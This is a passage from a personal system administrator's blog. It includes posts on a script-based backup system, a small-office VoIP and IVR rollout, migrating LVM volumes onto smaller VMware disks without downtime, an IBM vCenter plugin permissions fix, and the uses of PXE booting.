  • All files with the "Archive" attribute set were archived into a compressed file named like I_YYYYMMDD-HHSS.rar. After that the "Archive" attribute was cleared. This gave me incremental backups.
  • Once a month a full backup was made.
  • Full backups older than 3 months were removed together with all related incremental backups.
  • An intelligent restore script allowed me to restore any file or folder from any day within the last two months.
  • I was able to run the backup script at any moment, not just at night, and that allowed me to make several different backup copies during the day if needed.
To be honest, there is nothing special about this project. I could create something like that in a few hours now. But it was quite an interesting experience for a young admin, and it helped me understand better how CMD scripts work.

Result:

The script-based backup system completely fulfilled our needs at that time. The restore procedure was used many times over several years without a single failure.

Friday 30 March 2012

My Projects: My very first commercial project - VoIP

This is the first post in the "My Projects" series, and I decided to start with my very first project completed in a commercial organization.

It was the beginning of 2004, and my first (big enough) idea at the new place was to improve the telephony. Since quite a lot of time has passed, I cannot remember all the details, but the main thing is the idea.

What we had:

Equipment:
  • 1 main office with Panasonic KX-TD500 with about 8 external lines and about 150 extensions.
  • 2 big branches with some other PBXes
  • about 5 small branches with or without dedicated phone lines.

Situation:
We didn't have any kind of IVR implemented, so every call to the office was answered by two operators and forwarded manually. The main problem was that internal company calls also went via the PSTN, and our customers complained quite often that they couldn't get through the busy lines.

The second problem was that even two operators at the same time couldn't handle the whole flow of calls, so some percentage of inter-company calls was dropped, and of course there were quite important calls among them.

The same problem was experienced by our two big branches. The number of calls actually picked up was about 85% of the calls initiated! 1 out of 6 of our users or customers got a "busy" signal during the day!

Along with that, all branches were connected to the main office by SHDSL lines (doubled in some cases) which were almost unutilized (RDP traffic only).

Budget:
As usual: "Please do cheap, good and reliable".

Solution:

First we started with pretty cheap VoIP gateways from Dynamix. We had a very good impression of their gateways with FXS ports, and even installed them in 3 or 4 branches. But when we got to the next step of the project (integration with the existing telephone network), we found out that FXO gateways connected to the PBXes generated unacceptable echo. Support from Dynamix couldn't help us with that, so we had to give up on their hardware and started to look for another brand.

The next one was Planet. This time we got VoIP gateways with both FXO and FXS ports to test simultaneously, and this time the tests were successful. We began to install our solution step by step, and in two months we had the following configuration:

Equipment:
  • Main office - a Planet VoIP PBX (don't remember the model, but something like IPX-2000) with 2 modules of 4 ports each, connected to extension ports of the Panasonic KX-TD500.
  • Big branches - Planet VoIP H.323 gateways with 4 FXO ports, connected to extension ports of the local PBXes
  • Small branches - Planet VoIP H.323 gateways with 2 FXS ports, with phones connected directly to them.

Gentoo Linux with GnuGk was used as the H.323 gatekeeper (SIP wasn't really popular back then).

The IVR was configured on the Planet PBX and was also used for external incoming calls. There was a standard greeting like "Hello, this is company ABC, please enter an extension or wait for an operator". Even this made our users enormously happy.

Results:
After the project was completed, 100% of initiated calls reached the target extension or the operator.

Bills from the public telephony provider dropped by a factor of 2 (!). All the new equipment paid for itself in several months.

Side effect:
One of the operators was promoted to Office Manager, since there was no longer a need to have two operators working at the same time.

My Projects: prologue

I'm going to begin a series of posts aimed to create some kind of portfolio of projects in which I was involved.

I'm not sure there is a specific goal to this, but it will be useful first of all for me.

However, if somebody finds some of the posts interesting, I will just be happy about that.

Currently I have 16 drafts, which means 16 projects I found interesting enough to share. But for sure there will be more, because those 16 came to mind in just 10 minutes.

You can find them all under "My Projects" label.

Monday 20 February 2012

How to migrate data to smaller disks using LVM

Well, this post could have been given any number of other titles, because I'm going to write about Physical Extents in LVM, and this technique can be used for different purposes.

My particular issue was related to the fact that if you want to snapshot or clone a powered-on VM, you must be aware of some overhead for the VMDK files. You can find more details in VMware KB 1012384: "Creating a snapshot for a virtual machine fails with the error: File is larger than maximum file size supported".

The problem was that when I tried to clone a VM with a 256GB virtual drive (the maximum size for that datastore), I got the following errors:

Create virtual machine snapshot VIRTUALMACHINE File <unspecified filename> is larger than the maximum size supported by datastore '<unspecified datastore>'
File is larger than the maximum size supported by datastore
That was a production server, so I couldn't just turn it off for 30 minutes. At this moment I realized that I have a number of servers with the same problem and would face it again sooner or later.

Generally you cannot just decrease the disk size in the VM configuration. (Even if it were possible, it would be unwise to use: almost any file system will go crazy after a sudden change like that, and in most cases it will lead to data loss.)

Fortunately, I use LVM on all my servers, mainly to be able to extend volumes when needed. This time the task was to decrease the size of the Physical Volumes, and to do it without a second of downtime.

So, the steps were as follows:
  • Check your backups
  • Add the new virtual hard disks, keeping in mind the .vmdk size limits specified in VMware KB 1012384.
    Depending on your space allocation policy you can follow one of these options:
    a) add 2 disks of 250GB (in my case) with thin provisioning;
    b) add 1 disk of 250GB and 1 disk of 10GB. (I use round numbers to simplify the setup)
  • Re-scan scsi bus inside the VM:
# echo "- - -" > /sys/class/scsi_host/host0/scan
  • Create lvm partitions for all the added devices:
# fdisk /dev/sdX
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-32635, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-32635, default 32635):
Using default value 32635

Command (m for help): t
Selected partition 1
Hex code (type L to list codes): 8e
Changed system type of partition 1 to 8e (Linux LVM)

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.

  • Extend the Volume Group by adding those new disks

# lvm vgextend VolGroupXX /dev/sdX1 /dev/sdY1
  • Check the number of Physical Extents to migrate

# lvm pvdisplay
  --- Physical volume ---
  PV Name               /dev/sdf1
  VG Name               VolGroupXX
  PV Size               250.00 GiB / not usable 4.69 MiB
  Allocatable           yes
  PE Size               4.00 MiB
  Total PE              63998
  Free PE               63998
  Allocated PE          0
  PV UUID               Zp7uJR-YsIQ-AjRP-hdGL-OXSl-XbJG-N1GFn2
  --- Physical volume ---
  PV Name               /dev/sdg1
  VG Name               VolGroupXX
  PV Size               250.00 GiB / not usable 4.69 MiB
  Allocatable           yes
  PE Size               4.00 MiB
  Total PE              63998
  Free PE               63998
  Allocated PE          0
  PV UUID               eKdiqW-eMjI-ck4a-grM3-ogX3-6BOP-Q1ldlC
  --- Physical volume ---
  PV Name               /dev/sdb1
  VG Name               VolGroupXX
  PV Size               255.99 GiB / not usable 2.72 MiB
  Allocatable           yes (but full)
  PE Size               4.00 MiB
  Total PE              65534
  Free PE               0
  Allocated PE          65534
  PV UUID               PajbnY-65II-Aeyt-WamI-Xzr8-M3b2-kWfy6U

In this example /dev/sdf and /dev/sdg are the newly added 250GB hard drives, and /dev/sdb is the old 256GB one. The important part for us is "Total PE". If we call the pvmove command without specifying the range of Physical Extents to move, we will receive an error, because the destination is smaller than the source.
  • Migrate the Extents to the new hard drives
# lvm pvmove /dev/sdb1:1-63998 /dev/sdf1
# lvm pvmove /dev/sdb1 /dev/sdg1
As you noticed, I didn't specify the extent range for the second drive. In fact this command moves only the used extents.
Now you can extend the Logical Volume to use all the added space.
  • Extend the Logical Volume
# lvm lvextend -l +100%FREE VolGroupXX/LogVolXX

  • Extend the file system with the proper tool
# <resize2fs|resize_reiserfs|...> /dev/mapper/VolGroupXX-LogVolXX
  • And, finally, remove the old drives
# lvm vgreduce VolGroupXX /dev/sdb1
# lvm pvremove /dev/sdb1

Now you can remove the old drive from the VM configuration... zero downtime.

Well, many experienced Linux admins might not find anything new in this article. However, I didn't know how it worked until I faced the need for a change like this. For comparison, I have extended volumes so many times that the operation takes me about a minute (not counting the time spent by the FS resizing tool).

IBM DS3000/DS4000/DS5000 vCenter Management plugin issue

Not long ago I found out that IBM has a vCenter plugin for their storage. In particular I was interested in managing a DS3400 and a DS3524 via the vSphere Client console, so I got the plugin from this page.

However, during the setup of this plugin I faced a couple of issues.

First of all (this is minor actually, but I spent 20 minutes finding out what was happening), make sure you've chosen free TCP ports for the Jetty service. In my case there was a conflict with the vCenter Update service. A common issue, nothing special... however...

The second issue is rather VMware-specific, since I found the solution on a page related to another vCenter plugin. The problem is that you get the following error when you try to open this plugin in the vSphere Client:

User is not authorized to use this plug-in.
Please contact the Administrator and ask for StorageAdmin.readwrite or SorageAdmin.readonly Privileges


However, you are for sure in a group with full privileges... and actually that is the problem. It turns out that your account must have those privileges assigned directly, on a per-user basis, apart from any group.

So, as a workaround, just add a separate permission for your account and restart the vSphere Client.

Sunday 18 December 2011

Advantages of PXE

This is just a note about my positive experience with PXE. Although I worked with it some years ago, it has now become so simple to set up that it's definitely worth having in many cases.

The first case is when you have to install new systems pretty often. Of course, if you have to set up more than 5 identical systems it's reasonable to use an image or a kickstart, for example, but even then it's useful to have PXE configured to help with that. In my work, however, I often face situations where I need to prepare a new system for some special need, with different hardware and unique post-install steps.

The second case is when you need special tools available in a simple way. These could even be tools for the purposes mentioned above, like imaging (Acronis True Image, for example), or (what we use pretty often) GParted and a BartPE image. Yes, it's not a good idea to give everyone on your network tools like that, but it's really easy to protect any item in your PXE boot menu with a password. Of course, the way this function is implemented doesn't give you any strong protection, but if a guy is able to find and download the file with the password and decode it, he will also be able to make his own bootable USB drive with all the tools he needs. And, of course, I'm not talking about systems where the "bad guys" have no physical access.

I have also configured some live distributions over PXE. For example, I prepared a special installation of Ubuntu, put it on NFS, and configured it to mount the root (/) in a special way: nfs+ramfs=unionfs(aufs). Thus, I now have a network-booted system which is configured just how I need it, and which anyone can boot and configure however they want, yet no changes are applied to the real image on the network - after a reboot the system is clean and ready again.

I will not give any code examples, since there are plenty on the Internet. I started with this recipe and then just migrated it to the CentOS server. Unfortunately, I can't find the recipe I used to configure unionfs, but I can provide examples if anyone needs them, or you can just google keywords like "PXE aufs ramfs".